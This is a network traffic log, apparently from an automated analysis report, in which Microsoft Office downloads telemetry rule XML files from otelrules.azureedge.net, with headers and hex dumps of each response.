                2024-10-07 01:26:45 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                Session IDSource IPSource PortDestination IPDestination Port
                8192.168.2.44975213.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:45 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:45 UTC563INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:45 GMT
                Content-Type: text/xml
                Content-Length: 3788
                Connection: close
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Vary: Accept-Encoding
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                ETag: "0x8DC582BAC2126A6"
                x-ms-request-id: 4545068c-701e-0050-0e05-176767000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012645Z-1657d5bbd48jwrqbupe3ktsx9w000000030000000000bvut
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:45 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                Session IDSource IPSource PortDestination IPDestination Port
                9192.168.2.44975313.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:45 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:45 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:45 GMT
                Content-Type: text/xml
                Content-Length: 408
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                ETag: "0x8DC582BB56D3AFB"
                x-ms-request-id: 28f6fc08-301e-0020-466a-176299000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012645Z-1657d5bbd48dfrdj7px744zp8s00000002kg000000008ay9
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:45 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                Session IDSource IPSource PortDestination IPDestination Port
                10192.168.2.44975513.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:45 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:45 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:45 GMT
                Content-Type: text/xml
                Content-Length: 450
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                ETag: "0x8DC582BD4C869AE"
                x-ms-request-id: d4448e94-101e-00a2-2703-179f2e000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012645Z-1657d5bbd48vlsxxpe15ac3q7n00000002v0000000002sf8
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:45 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                Session IDSource IPSource PortDestination IPDestination Port
                11192.168.2.44975613.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:46 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:46 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:46 GMT
                Content-Type: text/xml
                Content-Length: 474
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                ETag: "0x8DC582B9964B277"
                x-ms-request-id: 3ea0840d-701e-0053-1012-173a0a000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012646Z-1657d5bbd4824mj9d6vp65b6n4000000032g0000000042z5
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:46 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                Session IDSource IPSource PortDestination IPDestination Port
                12192.168.2.44975713.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:46 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:46 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:46 GMT
                Content-Type: text/xml
                Content-Length: 415
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                ETag: "0x8DC582B9F6F3512"
                x-ms-request-id: 1707b783-801e-00a3-53e5-167cfb000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012646Z-1657d5bbd48vhs7r2p1ky7cs5w000000031g00000000n5he
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:46 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                Session IDSource IPSource PortDestination IPDestination Port
                13192.168.2.44975913.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:46 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:46 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:46 GMT
                Content-Type: text/xml
                Content-Length: 632
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                ETag: "0x8DC582BB6E3779E"
                x-ms-request-id: 15158de7-401e-0029-4b00-179b43000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012646Z-1657d5bbd48sdh4cyzadbb374800000002mg00000000evu5
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:46 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                Session IDSource IPSource PortDestination IPDestination Port
                14192.168.2.44976013.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:46 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:46 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:46 GMT
                Content-Type: text/xml
                Content-Length: 467
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                ETag: "0x8DC582BA6C038BC"
                x-ms-request-id: 87fc294c-201e-0051-40f3-167340000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012646Z-1657d5bbd48lknvp09v995n79000000002e000000000bm79
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:46 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                Session IDSource IPSource PortDestination IPDestination Port
                15192.168.2.44975813.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:46 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:46 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:46 GMT
                Content-Type: text/xml
                Content-Length: 471
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                ETag: "0x8DC582BB10C598B"
                x-ms-request-id: 73fc0cc0-d01e-008e-5fee-16387a000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012646Z-1657d5bbd48qjg85buwfdynm5w00000002xg000000008prs
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:46 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                Session IDSource IPSource PortDestination IPDestination Port
                16192.168.2.44976113.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:47 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:47 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:47 GMT
                Content-Type: text/xml
                Content-Length: 407
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                ETag: "0x8DC582BBAD04B7B"
                x-ms-request-id: 789c8418-601e-0032-5905-17eebb000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012647Z-1657d5bbd48tnj6wmberkg2xy800000002u000000000nfrt
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:47 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                Session IDSource IPSource PortDestination IPDestination Port
                17192.168.2.44976413.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:47 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:47 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:47 GMT
                Content-Type: text/xml
                Content-Length: 486
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                ETag: "0x8DC582B9018290B"
                x-ms-request-id: bf7deccb-401e-0064-0f0e-1754af000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012647Z-1657d5bbd48p2j6x2quer0q0280000000310000000007x7q
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:47 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                Session IDSource IPSource PortDestination IPDestination Port
                18192.168.2.44976213.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:47 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:47 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:47 GMT
                Content-Type: text/xml
                Content-Length: 486
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                ETag: "0x8DC582BB344914B"
                x-ms-request-id: 0a3893d3-c01e-0082-33ee-16af72000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012647Z-1657d5bbd48qjg85buwfdynm5w00000002ug00000000ktte
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:47 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                Session IDSource IPSource PortDestination IPDestination Port
                19192.168.2.44976513.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:47 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:47 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:47 GMT
                Content-Type: text/xml
                Content-Length: 407
                Connection: close
                Cache-Control: public, max-age=604800, immutable
